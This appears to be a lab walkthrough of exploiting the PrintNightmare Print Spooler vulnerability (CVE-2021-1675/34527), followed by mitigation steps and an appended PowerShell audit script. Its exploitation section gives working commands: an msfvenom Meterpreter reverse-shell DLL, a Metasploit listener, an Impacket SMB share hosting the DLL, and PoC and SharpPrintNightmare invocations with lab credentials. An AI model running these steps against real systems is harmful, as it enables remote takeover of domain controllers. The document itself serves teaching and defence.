PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675)

ABOUT THE WINDOWS PRINT SPOOLER

The Print Spooler is the service that manages print jobs sent from a computer to a printer and also lets the system act as a print client or print server. It has to be running for a computer to use a printer, and its main disadvantage is that it is enabled by default and runs in the SYSTEM context, so an attacker who can abuse it gains privileged access on the system. The service is also relevant on domain controllers because of printer pruning: in a domain controller printers are AD objects, and pruning is the process by which printers that are published but no longer available on the network are removed from AD, so that users do not keep trying to print to non-existent printers.

This vulnerability exists due to an authorisation bypass bug in the Print Spooler service (spoolsv.exe) on Windows systems, which allows authenticated remote users to install print drivers through the RPC call RpcAddPrinterDriver and to specify a driver file located at a remote path.

Two CVEs cover this vulnerability: one was assigned for the LPE and the other for the RCE, but the one originally classified as LPE, CVE-2021-1675, was later reclassified as an RCE.

1. CVE-2021-1675 → This exploit works for both attack vectors, LPE and RCE. Microsoft first classified this CVE as an LPE but later changed it to Remote Code Execution. For reference, the LPE exploit implementation is named "SharpPrintNightmare".

2. CVE-2021-34527 → Using this exploit, an attacker can remotely inject a malicious DLL by hosting the DLL on an SMB server.

HOW TO EXPLOIT THE VULNERABILITY REMOTELY

Before attempting to exploit the print spooler remotely, we can verify whether a host exposes the print spooler RPC interfaces, and so may be vulnerable to the PrintNightmare flaw, using the Impacket tool "rpcdump.py":

┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

EXPLOITATION

The delivery method for this exploit is a malicious DLL. This method is also described as "file-less" exploitation, which helps us bypass most of the protections on the system, such as antivirus software. In this attack I am going to trick the Print Spooler service into installing a new driver from a UNC path and loading it; in our case the driver is the malicious DLL, which gives us a reverse shell back to our attacker machine. To create the malicious DLL I'll be using "msfvenom", and since the target is a Windows 64-bit machine I'll embed a Windows x64 payload in the DLL, providing the LHOST and LPORT on which we will start a listener for the callback from the DLL. You can find the IP address of your machine by typing "ifconfig". In a later article I'll explain how to create a DLL using C++ that adds a user to the Windows system and logs in with the provided credentials if the WinRM port is open, but for now let's stick to msfvenom. Use the command below to create your malicious DLL.

┌──(root㉿snowdox)-[/home/snowdox]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.103.254 LPORT=9000 -f dll -o /home/snowdox/RedTeam/Print/Print_Mal.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
Saved as: /home/snowdox/RedTeam/Print/Print_Mal.dll

Now that we have created our malicious DLL, we have to start our listener in the Metasploit Framework to receive the Meterpreter shell when the DLL is executed on the system. To start the listener follow the steps below; at the end type "exploit -j" to start the listener in the background.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 9000
LPORT => 9000
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.18.103.254:9000
msf6 exploit(multi/handler) >

Now that our listener is running, let's start an SMB server to host the malicious DLL. Before that, make sure you have Impacket installed on the machine: Impacket is an open source collection of Python modules for programmatically constructing and manipulating network protocols. Change to the directory where you saved the DLL and run the "smbserver.py" script as shown below to host it.

┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Cool, now that everything is set up, we can start the exploitation process using the CVE-2021-1675 PoC, providing the domain controller, the user credentials and the UNC path of the malicious DLL hosted on our system.

┌──(root㉿snowdox)-[/home/snowdox/RedTeam/Print]
└─# python CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\10.18.103.254\share\Print_Mal.dll'
[*] Connecting to ncacn_np:10.10.220.93[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.18.103.254\share\Print_Mal.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

A few seconds after running the exploit script, going back to the listener we started in Metasploit shows that a Meterpreter session has been opened, so we can now interact with the victim machine through the Meterpreter shell.

THE USAGE OF THE EXPLOIT (CVE-2021-1675)

usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675/34527 implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                        and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Example:
./CVE-2021-34527.py eng.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\snowdox.dll'
./CVE-2021-34527.py eng.local/domain_user:Pass123@192.168.1.10 'C:\snowdox.dll'

SHARP-PRINTNIGHTMARE EXPLOIT

The SharpPrintNightmare/ directory contains the C# implementation of the PrintNightmare exploit, for both Local Privilege Escalation (LPE) (CVE-2021-1675) and Remote Code Execution (RCE). The RCE functionality requires execution with local admin privileges on the machine running the exploit.

#LPE
C:\SharpPrintNightmare.exe C:\snowdox.dll

#RCE using existing context
SharpPrintNightmare.exe '\\10.143.1.15\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\10.19.1.15'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\10.143.1.15\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' domain.local domain_username password

MITIGATION

METHOD 1-:

DISABLING PRINT SPOOLER SERVICE USING POWERSHELL

To protect your infrastructure against the PrintNightmare vulnerability you first need to identify where the service is running; in this case it is your Active Directory domain controller. Use the following PowerShell cmdlet to identify the Print Spooler service.

PS C:\Users\Nathaneal> Get-Service -Name Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

From the above result you can see that the system has a running "Print Spooler" service. Next, if your organisation is fine with disabling this service, we can use PowerShell to disable the Print Spooler service.

PS C:\Users\Nathaneal> Stop-Service -Name Spooler -Force

This command stops the service currently running on the system (here, the domain controller we are connected to).

PS C:\Users\Nathaneal> Set-Service -Name Spooler -StartupType Disabled

This command makes sure the service is not started again when the system reboots. After disabling the service completely, you can use the "rpcdump.py" tool to confirm that the system is no longer vulnerable to the PrintNightmare exploit:

┌──(root㉿snowdox)-[/home/snowdox]
└─# rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'

After executing the above command the print spooler interfaces are no longer listed, and neither exploit (RCE or LPE) works against the system.

METHOD 2-:

DISABLING INBOUND REMOTE PRINTING THROUGH GROUP POLICY

You can also configure the setting via Group Policy as follows:

Computer Configuration / Administrative Templates / Printers

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.
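As an added example (not code from the original article), the following PowerShell function audits a host for the two mitigations described above: Method 1 (service stopped and disabled) and Method 2 (the "Allow Print Spooler to accept client connections" policy disabled). It assumes Windows PowerShell 5.1 in an elevated session, the ActiveDirectory module for the domain controller sweep, and that the policy is backed by the documented registry value RegisterSpoolerRemoteRpcEndPoint under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers (2 = Disabled).

```powershell
# Added example, not from the original article.
# Audits a host for the PrintNightmare mitigations above and reports which apply.
function Test-PrintNightmareMitigation {
    [CmdletBinding()]
    param([string]$ComputerName = $env:COMPUTERNAME)

    $result = [ordered]@{
        ComputerName      = $ComputerName
        SpoolerStatus     = 'NotFound'
        SpoolerStartType  = 'NotFound'
        RemoteRpcEndpoint = 'NotConfigured'
        RemoteVectorClosed = $false
        LocalVectorClosed  = $false
    }

    # Method 1: service state and start type (Get-Service -ComputerName is Windows PowerShell 5.1).
    $svc = Get-Service -Name Spooler -ComputerName $ComputerName -ErrorAction SilentlyContinue
    if ($svc) {
        $result.SpoolerStatus    = $svc.Status.ToString()
        $result.SpoolerStartType = $svc.StartType.ToString()
    }

    # Method 2: Group Policy "Allow Print Spooler to accept client connections".
    # Assumed backing value (Microsoft-documented): RegisterSpoolerRemoteRpcEndPoint, 2 = Disabled.
    $hive = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
    $key  = $hive.OpenSubKey('SOFTWARE\Policies\Microsoft\Windows NT\Printers')
    if ($key) {
        $value = $key.GetValue('RegisterSpoolerRemoteRpcEndPoint')
        if ($null -ne $value) { $result.RemoteRpcEndpoint = $value }
    }

    # Stopping and disabling the service closes both vectors; the policy alone
    # only refuses inbound client connections, so the local vector stays open.
    $serviceOff = ($result.SpoolerStatus -eq 'Stopped' -and $result.SpoolerStartType -eq 'Disabled')
    $policyOff  = ($result.RemoteRpcEndpoint -eq 2)
    $result.LocalVectorClosed  = $serviceOff
    $result.RemoteVectorClosed = $serviceOff -or $policyOff

    [pscustomobject]$result
}

# Sweep every domain controller and list the ones still exposing the remote vector.
Get-ADDomainController -Filter * |
    ForEach-Object { Test-PrintNightmareMitigation -ComputerName $_.HostName } |
    Where-Object { -not $_.RemoteVectorClosed } |
    Format-Table -AutoSize
```

Run it from a management host with RPC access to the targets; a domain controller that appears in the output still needs one of the two mitigations applied.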